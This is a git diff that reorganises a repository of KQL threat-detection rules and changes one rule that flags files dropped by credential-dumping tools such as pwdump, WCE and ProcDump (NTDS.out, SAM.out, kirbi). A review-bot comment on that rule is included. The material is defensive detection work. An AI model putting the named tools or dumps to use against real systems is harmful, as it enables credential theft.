diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql b/KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql similarity index 100% rename from KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql rename to KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql b/KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql similarity index 100% rename from KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql rename to KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql diff --git a/KQL/rules/Discovery/system_network_connections_discovery_macos.kql b/KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/system_network_connections_discovery_macos.kql rename to KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql diff --git a/KQL/rules/Discovery/system_network_discovery_macos.kql b/KQL/rules/macos/process_creation/system_network_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/system_network_discovery_macos.kql rename to KQL/rules/macos/process_creation/system_network_discovery_macos.kql diff --git a/KQL/rules/Impact/system_shutdown_reboot_macos.kql b/KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql similarity index 100% rename from KQL/rules/Impact/system_shutdown_reboot_macos.kql rename to KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql 
diff --git a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql similarity index 100% rename from KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql rename to KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql diff --git a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql similarity index 100% rename from KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql rename to KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql similarity index 100% rename from KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql rename to KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql similarity index 100% rename from KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql rename to KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql similarity index 100% rename from KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql rename to KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql 
diff --git a/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql b/KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql similarity index 100% rename from KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql rename to KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql diff --git a/KQL/rules/Execution/successful_account_login_via_wmi.kql b/KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql similarity index 100% rename from KQL/rules/Execution/successful_account_login_via_wmi.kql rename to KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql diff --git a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql similarity index 100% rename from KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql rename to KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql diff --git a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql similarity index 100% rename from KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql rename to KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql diff --git a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql similarity index 100% rename from KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql rename to KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql 
diff --git a/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql b/KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql similarity index 100% rename from KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql rename to KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql diff --git a/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql b/KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql similarity index 100% rename from KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql rename to KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql diff --git a/KQL/rules/Discovery/sam_registry_hive_handle_request.kql b/KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql similarity index 100% rename from KQL/rules/Discovery/sam_registry_hive_handle_request.kql rename to KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql diff --git a/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql b/KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql rename to KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql diff --git a/KQL/rules/Discovery/syskey_registry_keys_access.kql b/KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql similarity index 100% rename from KQL/rules/Discovery/syskey_registry_keys_access.kql rename to KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql 
diff --git a/KQL/rules/Credential Access/wce_wceaux_dll_access.kql b/KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql similarity index 100% rename from KQL/rules/Credential Access/wce_wceaux_dll_access.kql rename to KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql b/KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql rename to KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql diff --git a/KQL/rules/Persistence/wmi_persistence_security.kql b/KQL/rules/windows/builtin/security/wmi_persistence_security.kql similarity index 100% rename from KQL/rules/Persistence/wmi_persistence_security.kql rename to KQL/rules/windows/builtin/security/wmi_persistence_security.kql diff --git a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql 
diff --git a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql 
diff --git a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql rename to KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql diff --git a/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql b/KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql similarity index 100% rename from KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql rename to KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql diff --git a/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql b/KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql similarity index 100% rename from KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql rename to KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql diff --git a/KQL/rules/Impact/backup_files_deleted.kql b/KQL/rules/windows/file/file_delete/backup_files_deleted.kql similarity index 100% rename from KQL/rules/Impact/backup_files_deleted.kql rename to KQL/rules/windows/file/file_delete/backup_files_deleted.kql diff --git a/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql b/KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql rename to KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql 
diff --git a/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql b/KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql rename to KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql diff --git a/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql b/KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql rename to KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql diff --git a/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql b/KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql rename to KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql diff --git a/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql b/KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql rename to KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql diff --git a/KQL/rules/Defense Evasion/prefetch_file_deleted.kql b/KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/prefetch_file_deleted.kql rename to KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql 
diff --git a/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql b/KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql rename to KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql diff --git a/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql b/KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql rename to KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql diff --git a/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql b/KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql similarity index 100% rename from KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql rename to KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql diff --git a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql similarity index 100% rename from KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql rename to KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql diff --git a/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql b/KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql similarity index 100% rename from KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql rename to KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql 
diff --git a/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql b/KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql similarity index 100% rename from KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql rename to KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql diff --git a/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql b/KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql similarity index 100% rename from KQL/rules/Discovery/advanced_ip_scanner_file_event.kql rename to KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql diff --git a/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql b/KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql similarity index 100% rename from KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql rename to KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql diff --git a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql b/KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql similarity index 100% rename from KQL/rules/Command and Control/anydesk_temporary_artefact.kql rename to KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql diff --git a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql similarity index 100% rename from KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql rename to KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql 
diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql b/KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql rename to KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql diff --git a/KQL/rules/Discovery/bloodhound_collection_files.kql b/KQL/rules/windows/file/file_event/bloodhound_collection_files.kql similarity index 100% rename from KQL/rules/Discovery/bloodhound_collection_files.kql rename to KQL/rules/windows/file/file_event/bloodhound_collection_files.kql diff --git a/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql b/KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql similarity index 100% rename from KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql rename to KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql diff --git a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql similarity index 100% rename from KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql rename to KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql diff --git a/KQL/rules/Resource Development/creation_of_a_diagcab.kql b/KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql similarity index 100% rename from KQL/rules/Resource Development/creation_of_a_diagcab.kql rename to KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql 
diff --git a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql rename to KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql diff --git a/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql similarity index 100% rename from KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql rename to KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql diff --git a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql b/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql similarity index 69% rename from KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql rename to KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql index ea5eca48..5915c1ac 100644 --- a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql +++ b/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql 
@@ -9,4 +9,4 @@ // - Legitimate Administrator using tool for password recovery DeviceFileEvents -| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll") \ No newline at end of file +| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or 
FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll") \ No newline at end of file diff --git a/KQL/rules/Execution/csexec_service_file_creation.kql b/KQL/rules/windows/file/file_event/csexec_service_file_creation.kql similarity index 100% rename from KQL/rules/Execution/csexec_service_file_creation.kql rename to KQL/rules/windows/file/file_event/csexec_service_file_creation.kql diff --git a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql similarity index 100% rename from KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql rename to KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql diff --git a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql similarity index 100% rename from KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql rename to KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql diff --git a/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql b/KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql rename to KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql 
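Review bot: The rewritten `| where` still has no ActionType restriction on DeviceFileEvents, so as far as I can tell from this table's schema the rule also fires when one of these files is modified, renamed or deleted, not only when it is dropped as the rule name and the Sigma file_event category imply; I would add `| where ActionType == "FileCreated"` (or an `in (...)` list if renames should count) before the filename predicate. The added `\\procdump.exe` / `\\procdump64.exe` / `\\procdump64a.exe` terms now match the stock Sysinternals binary names, so the false-positive comment in the header should also mention legitimate ProcDump deployments by administrators or crash-dump tooling, otherwise triage will not know this was a deliberate trade-off. As a point of style, the exact-name half of the predicate would be easier to maintain as `FileName in~ ("cachedump.exe", "cachedump64.exe", ..., "wceaux.dll")` rather than twenty `FolderPath endswith` clauses on one line, and it avoids depending on whether FolderPath carries the file name in this table — worth confirming against a live event before relying on either form.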
diff --git a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql b/KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql similarity index 100% rename from KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql rename to KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql diff --git a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql b/KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql rename to KQL/rules/windows/file/file_event/evtx_created_in_uncommon_location.kql diff --git a/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql b/KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql rename to KQL/rules/windows/file/file_event/file_creation_in_suspicious_directory_by_msdt_exe.kql diff --git a/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql b/KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql similarity index 100% rename from KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql rename to KQL/rules/windows/file/file_event/file_with_uncommon_extension_created_by_an_office_application.kql diff --git a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql rename to KQL/rules/windows/file/file_event/files_with_system_dll_name_in_unsuspected_locations.kql 
diff --git a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql rename to KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql diff --git a/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql b/KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql similarity index 100% rename from KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql rename to KQL/rules/windows/file/file_event/gathernetworkinfo_vbs_reconnaissance_script_output.kql diff --git a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql b/KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql similarity index 100% rename from KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql rename to KQL/rules/windows/file/file_event/gotoassist_temporary_installation_artefact.kql diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql rename to KQL/rules/windows/file/file_event/hacktool_crackmapexec_file_indicators.kql diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql b/KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql rename to KQL/rules/windows/file/file_event/hacktool_dumpert_process_dumper_default_file.kql 
diff --git a/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql
rename to KQL/rules/windows/file/file_event/hacktool_impacket_file_indicators.kql
diff --git a/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql b/KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql
similarity index 100%
rename from KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql
rename to KQL/rules/windows/file/file_event/hacktool_inveigh_execution_artefacts.kql
diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql b/KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql
rename to KQL/rules/windows/file/file_event/hacktool_mimikatz_kirbi_file_creation.kql
diff --git a/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql b/KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql
rename to KQL/rules/windows/file/file_event/hacktool_nppspy_hacktool_usage.kql
diff --git a/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql b/KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
rename to KQL/rules/windows/file/file_event/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
diff --git a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql
similarity index 100%
rename from KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
rename to KQL/rules/windows/file/file_event/hacktool_powerup_write_hijack_dll.kql
diff --git a/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql b/KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql
rename to KQL/rules/windows/file/file_event/hacktool_quarkspwdump_dump_file.kql
diff --git a/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql b/KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
similarity index 100%
rename from KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
rename to KQL/rules/windows/file/file_event/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql b/KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql
rename to KQL/rules/windows/file/file_event/hacktool_safetykatz_dump_indicator.kql
diff --git a/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql b/KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql
rename to KQL/rules/windows/file/file_event/hacktool_typical_hivenightmare_sam_file_export.kql
